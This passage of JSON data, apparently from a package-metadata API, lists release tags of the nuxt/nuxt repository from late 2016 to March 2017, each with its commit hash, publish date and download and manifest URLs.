tar.gz/v0.10.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.5/manifests"},{"name":"v0.10.4","sha":"5ff6424e09eb2262b975c9c544c57e681fbf7591","kind":"commit","published_at":"2017-03-25T18:03:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.4/manifests"},{"name":"v0.10.3","sha":"c9784651e9c482ad90ec9c39359ac9dfd1e199bf","kind":"commit","published_at":"2017-03-25T11:57:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"77439223cfb9d3c64928d8888113898f4b1fa5d3","kind":"commit","published_at":"2017-03-25T11:36:58.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"ea5881e64a797ded299740017391f36ea7f94e09","kind":"commit","published_at":"2017-03-25T02:41:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.1/manifests"},{"name":"v0.10.0","sha":"bfe62b7d71d4ac64a4d411a83cec808824082b4f","kind":"commit","published_at":"2017-03-24T18:05:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.0/manifests"},{"name":"v0.9.9","sha":"df04b959c219789621f1f4ce239fb2f64c069eee","kind":"commit","published_at":"2017-02-10T23:41:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.9/manifests"},{"name":"v0.9.8","sha":"e7f0200a58f17d429b00641d015e6f7f87f99fd0","kind":"commit","published_at":"2017-02-10T01:22:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.8/manifests"},{"name":"v0.9.7","sha":"8d17d20dba2a81072173c68fa774d7a49cae716a","kind":"commit","published_at":"2017-01-30T11:41:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.7/manifests"},{"name":"v0.9.6","sha":"1556787e0164bdb4b15542dedf32762c481f274c","kind":"commit","published_at":"2017-01-15T16:33:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.6/manifests"},{"name":"v0.9.5","sha":"42a3b007514eea3e87a4bd0c083dad6524ecfead","kind":"commit","published_at":"2016-12-27T16:07:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.5/manifests"},{"name":"v0.9.4","sha":"05be1ed6b12e7d88fe7adc2af5ed0568cf40ddb0","kind":"commit","published_at":"2016-12-25T20:15:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.4/manifests"},{"name":"v0.9.3","sha":"1fc685a88037fdac0b826d8d814fcd1c3b320fda","kind":"commit","published_at":"2016-12-24T18:00:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.3/manifests"},{"name":"v0.9.2","sha":"2a9519e7203004955ffc70f0c8f762e6afeb9816","kind":"commit","published_at":"2016-12-23T12:09:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.2/manifests"},{"name":"v0.9.1","sha":"baaaefbf2c76f362fd0be9f34c1444e439e8c746","kind":"commit","published_at":"2016-12-20T11:55:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.1/manifests"},{"name":"v0.9.0","sha":"004e21b929b901ae54d92abf339c51a9d666b373","kind":"commit","published_at":"2016-12-19T19:37:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.0/manifests"},{"name":"v0.8.8","sha":"803b21bf17a21bac5eb97d84de35fa7d08c3b73e","kind":"commit","published_at":"2016-12-09T19:10:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.8/manifests"},{"name":"v0.8.6","sha":"d482711cbe2a9f50a6a4804bdf1292739dd581ab","kind":"commit","published_at":"2016-12-09T12:52:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.6/manifests"},{"name":"v0.8.5","sha":"151bd73b8250816c3918e52777e9a7387df7be4a","kind":"commit","published_at":"2016-12-09T12:46:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.5/manifests"},{"name":"v0.8.4","sha":"e254e1117736f73a3455b0f795e9f9bd9e0364ab","kind":"commit","published_at":"2016-12-08T20:15:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.4/manifests"},{"name":"v0.8.3","sha":"4895433d3383407dd243acc0718bc9fa33ad28ff","kind":"commit","published_at":"2016-12-08T10:43:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.3/manifests"},{"name":"v0.8.2","sha":"40e28de226dbefd24e228c801b28892ca91e33e4","kind":"commit","published_at":"2016-12-07T22:58:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.2/manifests"},{"name":"v0.8.1","sha":"78a2c5afe747c7009ff618a79f14ddf83c19efed","kind":"commit","published_at":"2016-12-07T22:44:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.1/manifests"},{"name":"v0.8.0","sha":"be5e8c118d1415e33031772daca422a0fae511bf","kind":"commit","published_at":"2016-12-07T18:43:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.0/manifests"},{"name":"v0.7.9","sha":"8801327db20c2e5daa594a7d8ad95d7a2a582a14","kind":"commit","published_at":"2016-12-04T18:16:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.9/manifests"},{"name":"v0.7.8","sha":"ddbffcc8af4393e14cc44daa94b4a27a21c6fadf","kind":"commit","published_at":"2016-12-01T18:09:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.8/manifests"},{"name":"v0.7.7","sha":"fdc430b23bac4a0cf86b0bc0da7828a573a0176d","kind":"commit","published_at":"2016-11-28T16:28:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.7/manifests"},{"name":"v0.7.6","sha":"53499f2a6b0ebf7514f984f6d81ce76ab9aaeb09","kind":"commit","published_at":"2016-11-27T17:46:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.6/manifests"},{"name":"v0.7.5","sha":"3ed1340d568c36f65bfe66618f9ac8119e8408de","kind":"commit","published_at":"2016-11-27T17:13:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.5/manifests"},{"name":"v0.7.4","sha":"bcf291b54761b64c271573e045e9275f189c3bea","kind":"commit","published_at":"2016-11-25T16:58:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.4/manifests"},{"name":"v0.7.3","sha":"cb1994319cd920b77181d852daf79a9c2c51b25c","kind":"commit","published_at":"2016-11-25T14:37:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.3/manifests"},{"name":"v0.7.2","sha":"4b9fb87c860f69d4b5044533aee0c16310b10aa1","kind":"commit","published_at":"2016-11-24T13:41:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.2/manifests"},{"name":"v0.7.1","sha":"d984c8803d9dd1e58c56a08b97f7d38ba5cb92b7","kind":"commit","published_at":"2016-11-24T12:16:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.1/manifests"},{"name":"v0.7.0","sha":"40515ac91a9e4ae5fd7b4a37c75de2843f6d3fbc","kind":"commit","published_at":"2016-11-24T00:47:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.0/manifests"},{"name":"v0.6.9","sha":"5b35834f42aa6cea3724f098787587a86ec6f4c3","kind":"commit","published_at":"2016-11-23T13:05:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.9/manifests"},{"name":"v0.6.8","sha":"57b55dc5126ae271f3b87b2d3ffdac49055e355e","kind":"commit","published_at":"2016-11-22T23:47:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.8/manifests"},{"name":"v0.6.7","sha":"57b55dc5126ae271f3b87b2d3ffdac49055e355e","kind":"commit","published_at":"2016-11-22T23:47:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.7/manifests"},{"name":"v0.6.6","sha":"fc598ea66e1249645ed3677d8725efc1c048ba2d","kind":"commit","published_at":"2016-11-22T23:27:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.6/manifests"},{"name":"v0.6.5","sha":"2400fabceb3b76b756efc8ede2919a4ccb088345","kind":"commit","published_at":"2016-11-21T18:53:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.5/manifests"},{"name":"v0.6.0","sha":"edd0227e746c2ecde781915bd8c59e98f399439a","kind":"commit","published_at":"2016-11-21T13:15:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.0/manifests"},{"name":"v0.5.2","sha":"b8436b067f8375bb91e4b99cc528661eaa27c43c","kind":"commit","published_at":"2016-11-20T11:23:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.2/manifests"},{"name":"v0.5.3","sha":"b8436b067f8375bb91e4b99cc528661eaa27c43c","kind":"commit","published_at":"2016-11-20T11:23:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.3/manifests"},{"name":"v0.5.1","sha":"8cbbaeaf838e33bb6e23f06e15724b39042c5206","kind":"commit","published_at":"2016-11-20T10:37:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.1/manifests"},{"name":"v0.5.0","sha":"e48f8250a084202fbc492df55f13e3803e2b74cf","kind":"commit","published_at":"2016-11-18T13:45:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.0/manifests"},{"name":"v0.4.9","sha":"d4b8bc4f022459c976b41cb9845be38759a0481a","kind":"commit","published_at":"2016-11-18T09:38:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.9/manifests"},{"name":"v0.4.8","sha":"d928c9e5970e9d08eec61fe6770325d8c74e6d5b","kind":"commit","published_at":"2016-11-18T08:19:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.8/manifests"},{"name":"v0.4.7","sha":"49f67566c2d74a661421be1589279b316dcc9e49","kind":"commit","published_at":"2016-11-17T21:12:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.7/manifests"},{"name":"v0.4.6","sha":"06edc8029b796b8008fe52a682159636d10f3e7a","kind":"commit","published_at":"2016-11-17T13:02:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.6/manifests"},{"name":"v0.4.4","sha":"2677afb46fc4a950d62f32e6172aeaa2fdcc5a8b","kind":"commit","published_at":"2016-11-17T10:57:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.4/manifests"},{"name":"v0.4.3","sha":"a98e6d4e9bda0491bf8f32815701f42f28c793a2","kind":"commit","published_at":"2016-11-16T17:41:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.3/manifests"},{"name":"v0.4.2","sha":"d2c0f01593e669147396ff25c4a017372a8390ea","kind":"commit","published_at":"2016-11-16T17:06:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.2","manifests_url":"h